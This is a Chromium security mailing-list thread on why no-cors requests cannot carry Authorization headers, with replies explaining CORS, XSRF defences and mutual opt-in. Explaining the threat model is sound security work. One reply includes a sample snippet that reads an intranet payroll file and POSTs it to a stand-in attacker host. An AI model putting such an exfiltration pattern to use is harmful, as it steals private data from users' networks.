Why does "no-cors" disallow Authorization headers?

Jeremy Lewi

Mar 10, 2023, 1:21:48 PM
to site-isol...@chromium.org
Hi Folks,

I was hoping someone here might be willing to explain the threat model that blocking most headers when CORS is disabled is guarding against. This seems to be a blocker for a wide range of useful webapps, like Postman on the web. Why can't Chromium allow a client app to disable CORS while still being able to set an Authorization header with a credential the client app obtained (e.g. via an OAuth flow)? Concretely, I'd like to create a webapp that obtains GCP, GitHub, or other API credentials and then accesses those APIs. As far as I can tell, some of these APIs don't support CORS OPTIONS preflights (I get 400s).
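
For concreteness, here's roughly what I'm trying to do (a minimal sketch; the endpoint and token are placeholders):

    // Hypothetical endpoint and token, purely for illustration.
    const token = "<token obtained via an OAuth flow>";

    // With mode "no-cors" the browser silently drops Authorization,
    // since it isn't a no-cors-safelisted request header, and the
    // response comes back opaque (status 0, unreadable body).
    const res = await fetch("https://api.example.com/v1/resource", {
      mode: "no-cors",
      headers: { Authorization: `Bearer ${token}` },
    });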

IIUC, CORS is needed because by default the browser attaches any cookies for a site when making requests to that site, even if the client app doesn't have access to the cookie. So disabling that behavior is necessary when running without CORS. However, blocking client apps from sending validly obtained credentials seems like an overreach, and it blocks any API that doesn't implement CORS (which anecdotally seems like quite a lot).
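
For reference, this is roughly the server-side opt-in I mean by "implement CORS" (a minimal sketch using Node's built-in http module; the origin and port are invented):

    import { createServer } from "node:http";

    createServer((req, res) => {
      // The opt-in: without these headers the browser refuses to expose
      // the response (or forward the Authorization header) to acme.co.
      res.setHeader("Access-Control-Allow-Origin", "https://acme.co");
      res.setHeader("Access-Control-Allow-Headers", "Authorization");
      if (req.method === "OPTIONS") {
        res.writeHead(204).end(); // the preflight some APIs answer with a 400
        return;
      }
      res.writeHead(200, { "Content-Type": "application/json" });
      res.end(JSON.stringify({ ok: true }));
    }).listen(8080);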

I thought browsers had pretty good sandboxing for JS apps. So my expectation would be that if I trust https://acme.co, I should be fine going through an OAuth flow and granting it an access token to access APIs on my behalf. I can get around CORS by delivering the same application as a native application, but I don't see what added security that buys. On the other hand, it adds considerable friction compared to just opening a site in the browser.

Best,
J



Łukasz Anforowicz

Mar 10, 2023, 1:43:42 PM
to Jeremy Lewi, site-isol...@chromium.org, securi...@chromium.org
<+securi...@chromium.org which is a slightly broader discussion list>

The short (and even if technically correct maybe not so helpful) answer is that handling of HTTP headers in no-cors requests follows the behavior prescribed in the spec: https://fetch.spec.whatwg.org/#no-cors-safelisted-request-header.  I tried to look at `git blame` on https://github.com/whatwg/fetch/blame/main/fetch.bs but couldn't find a clear rationale for this.  So, I think I can only speculate why the spec is written this way:
  • CORS is required for POST requests, and custom headers may be seen as a variant of this (i.e. another scenario that doesn't use the plain-vanilla HTTP requests of a regular <img> tag).
  • Some XSRF protection techniques rely on disallowing custom headers in no-cors requests (see the sketch below).
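
To illustrate the second point, a common pattern looks roughly like this (the header name is just a convention, not mandated anywhere; the sketch uses Node's built-in http module):

    import { createServer } from "node:http";

    createServer((req, res) => {
      // A plain <form> post or a no-cors fetch cannot attach this header,
      // so its presence implies same-origin JS or a caller the server
      // already approved via a CORS preflight. If no-cors requests could
      // carry arbitrary headers, this XSRF check would be useless.
      if (req.headers["x-requested-with"] !== "XMLHttpRequest") {
        res.writeHead(403).end("possible XSRF");
        return;
      }
      res.writeHead(200).end("ok");
    }).listen(8080);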

Jeremy Lewi

Mar 10, 2023, 9:51:21 PM
to Łukasz Anforowicz, site-isol...@chromium.org, securi...@chromium.org
Appreciate the quick response. I'm still unclear whether it's this way because there's no secure way to support cross-origin requests without requiring servers to implement CORS, or because no one has bothered to invest in a mechanism suitable for modern web apps. Given the amount of energy invested in dealing with CORS (e.g. via proxies, as sketched below), it seems unlikely there hasn't been robust discussion about possible alternatives.
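
By proxies I mean the usual workaround of bouncing requests through a server you control, which grants the CORS opt-in itself (a GET-only sketch; the upstream host is illustrative, and a real proxy would validate paths and restrict origins):

    import { createServer } from "node:http";

    createServer(async (req, res) => {
      // Forward the browser's request to the real API; the proxy, not
      // the API, is what allows the cross-origin read.
      const upstream = await fetch(`https://api.example.com${req.url}`, {
        headers: { authorization: req.headers["authorization"] ?? "" },
      });
      res.writeHead(upstream.status, {
        "Access-Control-Allow-Origin": "*",
        "Content-Type": upstream.headers.get("content-type") ?? "text/plain",
      });
      res.end(await upstream.text());
    }).listen(8080);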

Jeremy Lewi

Mar 14, 2023, 11:02:30 AM
to Daniel Veditz, site-isol...@chromium.org, securi...@chromium.org
Hi Dan,

This really clarifies things. Thank you very much.

For posterity, I'll just add one other document which I found really helpful.

J

On Mon, Mar 13, 2023 at 5:41 PM Daniel Veditz <dve...@mozilla.com> wrote:
On Mon, Mar 13, 2023 at 2:05 AM Jeremy Lewi <jer...@lewi.us> wrote:
Appreciate the quick response. I'm still unclear whether it's this way because there's no secure way to support cross-origin requests without requiring servers to implement CORS, or because no one has bothered to invest in a mechanism suitable for modern web apps.

We have found no secure way to support cross-origin HTTP requests without some form of mutual opt-in. Lots of things could be "secure enough" for many sites, but there's no end to sites running code that makes really old assumptions about what a web page can do. In particular, the browser can't know whether a URL is public until it gets the answer, at which point it could be too late and some kind of CSRF has just happened. Cookies are an obvious clue that the request might be part of a stateful transaction, but the absence of cookies doesn't mean it's not: the authorization might be buried in the URL itself or in some added headers.

New features shouldn't create security problems for old sites. That's not fair to the authors of those sites, and it's dangerous for their users. It's frustrating to everyone, because there are sites where it would "obviously" be safe and beneficial to allow use of the data. The problem is that it's not obvious to the browser, which has no brain that can distinguish safe sites from problematic ones.
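
To make the hazard concrete, here is a sketch of what any page could do if cross-origin reads required no opt-in (hostnames invented):

    // Probe a URL that is only reachable (or only authorized) from the
    // victim's network or session, then exfiltrate the answer. Today the
    // first read is blocked unless the server opts in via CORS.
    const r = await fetch("https://intranet.corp.example/payroll.csv");
    const data = await r.text();
    await fetch("https://attacker.example/steal", { method: "POST", body: data });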

CORS is not getting in the way of your communicating; CORS is allowing a whole lot of communication that was never possible before CORS was invented.

Most of these restrictions exist because browsers don't know what the user wants or expects. Instead of the two origins mutually opting in through CORS, you could imagine a user setting for "I trust prettycharts.com to talk to censusdata.org on my behalf" and then allowing any connection at all. We haven't figured out a way to expose that to users in a form they'd understand, and we're afraid of the annoyance and abuse we'd unleash if we allowed sites to request it (if you thought constant geolocation requests were bad...). But Web Extensions, which users explicitly install, can make these kinds of unfettered requests, bounded by the permissions the user granted.

The CORS FAQ captures some of the early thinking on this: https://www.w3.org/wiki/CORS
You can find the raw historical discussions in the whatwg mailing list archives.

-Dan Veditz